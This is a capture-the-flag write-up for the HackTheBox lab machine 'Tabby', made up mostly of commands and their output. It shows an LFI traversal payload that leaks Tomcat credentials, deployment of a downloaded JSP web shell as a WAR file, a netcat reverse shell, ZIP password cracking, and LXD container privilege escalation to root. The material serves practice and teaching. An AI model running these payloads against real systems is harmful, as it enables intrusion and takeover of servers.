WriteupsHTB — Tabby
WebEasyLinux
HTB — Tabby
LFI on Tomcat manager exposes credentials. WAR file deployed for RCE. ZIP password cracking, LXD container privilege escalation for root.
November 26, 2024HackTheBox
#LFI#Tomcat#WAR#LXD
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.194
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 16:41 EST
Nmap scan report for 10.10.10.194
Host is up (0.023s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/26%OT=22%CT=1%CU=44434%PV=Y%DS=2%DC=T%G=Y%TM=674
OS:6409B%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=2%ISR=106%T
OS:I=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=
OS:M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE
OS:88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%
OS:DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=
OS:G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 23.98 ms 10.10.14.1
2 24.13 ms 10.10.10.194
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.40 seconds
80/tcp open http
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Mega Hosting
|_http-server-header: Apache/2.4.41 (Ubuntu)feroxbuster
sh
feroxbuster --url http://10.10.10.194
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.194
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 313c http://10.10.10.194/assets => http://10.10.10.194/assets/
301 GET 9l 28w 317c http://10.10.10.194/assets/css => http://10.10.10.194/assets/css/
301 GET 9l 28w 319c http://10.10.10.194/assets/fonts => http://10.10.10.194/assets/fonts/
200 GET 60l 80w 1510c http://10.10.10.194/assets/fonts/stylesheet.css
200 GET 128l 251w 3282c http://10.10.10.194/assets/js/main.js
200 GET 7l 400w 35601c http://10.10.10.194/assets/js/vendor/bootstrap.min.js
200 GET 536l 897w 8362c http://10.10.10.194/assets/css/fonticons.css
200 GET 9l 80w 3918c http://10.10.10.194/assets/js/jquery.easypiechart.min.js
200 GET 111l 179w 1713c http://10.10.10.194/assets/css/responsive.css
200 GET 14l 302w 28935c http://10.10.10.194/assets/js/jquery.mixitup.min.js
200 GET 822l 1392w 13934c http://10.10.10.194/assets/css/style.css
200 GET 12l 689w 40858c http://10.10.10.194/assets/js/vendor/isotope.min.js
200 GET 4l 1412w 95931c http://10.10.10.194/assets/js/vendor/jquery-1.11.2.min.js
200 GET 5l 1421w 113498c http://10.10.10.194/assets/css/bootstrap.min.css
301 GET 9l 28w 312c http://10.10.10.194/files => http://10.10.10.194/files/
301 GET 9l 28w 316c http://10.10.10.194/assets/js => http://10.10.10.194/assets/js/
301 GET 9l 28w 320c http://10.10.10.194/assets/images => http://10.10.10.194/assets/images/
200 GET 17l 68w 5223c http://10.10.10.194/logo.png
200 GET 11l 391w 20106c http://10.10.10.194/assets/js/vendor/modernizr-2.8.3-respond-1.4.2.min.js
200 GET 4l 63w 26711c http://10.10.10.194/assets/css/font-awesome.min.css
200 GET 85l 868w 67760c http://10.10.10.194/assets/js/plugins.js
200 GET 3055l 5810w 128648c http://10.10.10.194/assets/css/plugins.css
200 GET 373l 938w 14175c http://10.10.10.194/
301 GET 9l 28w 320c http://10.10.10.194/files/archive => http://10.10.10.194/files/archive/
301 GET 9l 28w 323c http://10.10.10.194/assets/js/vendor => http://10.10.10.194/assets/js/vendor/
200 GET 150l 375w 6507c http://10.10.10.194/files/statement
[####################] - 62s 270079/270079 0s found:26 errors:111
[####################] - 61s 30000/30000 494/s http://10.10.10.194/
[####################] - 58s 30000/30000 514/s http://10.10.10.194/assets/
[####################] - 61s 30000/30000 494/s http://10.10.10.194/assets/images/
[####################] - 61s 30000/30000 493/s http://10.10.10.194/assets/css/
[####################] - 60s 30000/30000 501/s http://10.10.10.194/assets/fonts/
[####################] - 56s 30000/30000 538/s http://10.10.10.194/files/
[####################] - 56s 30000/30000 538/s http://10.10.10.194/assets/js/
[####################] - 56s 30000/30000 540/s http://10.10.10.194/files/archive/
[####################] - 54s 30000/30000 552/s http://10.10.10.194/assets/js/vendor/ 
LFI
8080/tcp open http
sh
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
tomcat-users.xml
view-source:http://megahosting.htb/news.php?file=../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
creds
tomcat:$3cureP4s5w0rd123!
sh
feroxbuster --url http://10.10.10.194:8080/manager
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.194:8080/manager
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 44l 184w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c http://10.10.10.194:8080/manager => http://10.10.10.194:8080/manager/
302 GET 0l 0w 0c http://10.10.10.194:8080/manager/images => http://10.10.10.194:8080/manager/images/
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text/
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text/css
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/html
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/text
401 GET 63l 291w 2499c http://10.10.10.194:8080/manager/status
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/[
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/plain]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/plain]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/[
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/quote]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/quote]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/extension]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/extension]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/[0-9]
400 GET 1l 72w 771c http://10.10.10.194:8080/manager/images/[0-9]
sh
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jspsh
curl --upload-file backup.war -u 'tomcat:$3cureP4s5w0rd123!' "http://10.10.10.194:8080/manager/text/deploy?path=/backup"
OK - Deployed application at context path [/backup]http://10.10.10.194:8080/backup/cmd.jsp?cmd=whoami
rev shell
sh
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.194] 58250
whoiami
whoami
tomcatsh
python3 -c 'import pty; pty.spawn("/bin/bash")'backup.zip
sh
tomcat@tabby:/var/www/html/files$ ls -al
ls -al
total 36
drwxr-xr-x 4 ash ash 4096 Aug 19 2021 .
drwxr-xr-x 4 root root 4096 Aug 19 2021 ..
-rw-r--r-- 1 ash ash 8716 Jun 16 2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Aug 19 2021 archive
drwxr-xr-x 2 root root 4096 Aug 19 2021 revoked_certs
-rw-r--r-- 1 root root 6507 Jun 16 2020 statementsh
wget http://10.10.10.194:9000/16162020_backup.zip- password protected
sh
unzip 16162020_backup.zip -d backup
Archive: 16162020_backup.zip
creating: backup/var/www/html/assets/
[16162020_backup.zip] var/www/html/favicon.ico password: sh
zip2john 16162020_backup.zip > 16162020_backup.hashsh
john --wordlist=/usr/share/wordlists/rockyou.txt 16162020_backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it (16162020_backup.zip)creds
ash:admin@it
sh
unzip 16162020_backup.zip -d backup
Archive: 16162020_backup.zip
[16162020_backup.zip] var/www/html/favicon.ico password:
inflating: backup/var/www/html/favicon.ico
creating: backup/var/www/html/files/
inflating: backup/var/www/html/index.php
extracting: backup/var/www/html/logo.png
inflating: backup/var/www/html/news.php
inflating: backup/var/www/html/Readme.txt sh
tomcat@tabby:/home$ su ash
su ash
Password: admin@it
ash@tabby:/home$ whoami
whoami
ashuser.txt
sh
ash@tabby:~$ cat user.txt
cat user.txt
650898c7...priv esc
sh
ash@tabby:~$ id
id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)lxd group
sh
/root/go/bin/distrobuilder build-lxc alpine.yaml -o image.release=3.18sh
┌──(root㉿kali)-[/home/…/htb-labs/Tabby/ContainerImages/alpine]
└─# ls
alpine.yaml meta.tar.xz rootfs.tar.xzsh
ash@tabby:~$ wget http://10.10.14.4/meta.tar.xz
ash@tabby:~$ wget http://10.10.14.4/rootfs.tar.xzsh
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpinesh
ash@tabby:~$ wget http://10.10.14.4/alpine-v3.13-x86_64-20210218_0139.tar.gzsh
ash@tabby:~$ /snap/bin/lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias ubuntutemp
ash@tabby:~$ /snap/bin/lxc image list
/snap/bin/lxc image list
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ubuntutemp | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | CONTAINER | 3.11MB | Nov 27, 2024 at 2:08am (UTC) |
+------------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+sh
ash@tabby:~$ /snap/bin/lxd init
/snap/bin/lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: [Enter]
Do you want to configure a new storage pool? (yes/no) [default=yes]: [Enter]
Name of the new storage pool [default=default]: [Enter]
Name of the storage backend to use (dir, lvm, zfs, ceph, btrfs) [default=zfs]: [Enter]
Create a new ZFS pool? (yes/no) [default=yes]: [Enter]
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]: [Enter]
Size in GB of the new loop device (1GB minimum) [default=5GB]: [Enter]
Would you like to connect to a MAAS server? (yes/no) [default=no]: [Enter]
Would you like to create a new local network bridge? (yes/no) [default=yes]: [Enter]
What should the new bridge be called? [default=lxdbr0]: [Enter]
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: none
none
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: none
none
Would you like the LXD server to be available over the network? (yes/no) [default=no]: [Enter]
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] [Enter]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: [Enter]
sh
ash@tabby:~$ /snap/bin/lxc init ubuntutemp ignite -c security.privileged=true
ash@tabby:~$ /snap/bin/lxc start ignite
ash@tabby:~$ /snap/bin/lxc exec ignite /bin/sh
~ # ^[[25;5Rid
id
uid=0(root) gid=0(root)sh
cd /mnt
/mnt # ^[[25;8Rls
ls
root
/mnt # ^[[25;8Rcd root
cd rootroot.txt
sh
/mnt/root/root # ^[[25;18Rcat root.txt
cat root.txt
361ca58d...Up next
EasyNov 2024
HTB — CozyHosting
Spring Boot Actuator exposes session cookies. Hijacked admin session to exploit command injection in SSH endpoint for reverse shell.
Read writeup
EasyJan 2025
HTB — LinkVortex
Ghost CMS CVE-2023-40028 arbitrary file read vulnerability. Symlink traversal via config reveals credentials for lateral movement and sudo privesc.
Read writeup
EasyJan 2025
HTB — UnderPass
daloRADIUS web interface default credentials expose user hashes. Cracked MD5 hash for SSH. Mosh binary sudo privesc for root shell.
Read writeup